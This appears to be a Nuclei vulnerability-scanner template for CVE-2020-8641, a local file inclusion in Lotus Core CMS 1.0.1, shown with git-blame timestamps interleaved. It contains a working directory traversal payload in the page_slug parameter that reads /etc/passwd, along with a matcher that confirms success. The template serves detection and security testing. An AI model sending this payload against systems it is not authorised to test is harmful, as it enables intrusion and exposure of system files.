2021-10-10 22:37:10 +00:00
|
|
|
id: CVE-2020-8641
|
2021-10-10 12:19:56 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Lotus Core CMS 1.0.1 - Local File Inclusion
|
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
2022-06-28 15:00:26 +00:00
|
|
|
description: Lotus Core CMS 1.0.1 allows authenticated local file inclusion of .php files via directory traversal in the index.php page_slug parameter.
|
2021-10-10 22:37:10 +00:00
|
|
|
reference:
|
|
|
|
- https://cxsecurity.com/issue/WLB-2020010234
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://www.exploit-db.com/exploits/47985
|
2022-06-28 15:00:26 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-8641
|
2021-10-10 22:40:30 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 8.8
|
2021-10-10 22:40:30 +00:00
|
|
|
cve-id: CVE-2020-8641
|
|
|
|
cwe-id: CWE-22
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: cve2020,lfi,lotus,cms,edb,cve
|
2021-10-10 12:19:56 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-03-22 08:01:31 +00:00
|
|
|
- "root:.*:0:0:"
|
2021-10-10 12:19:56 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-06-28 15:00:26 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/06/28
|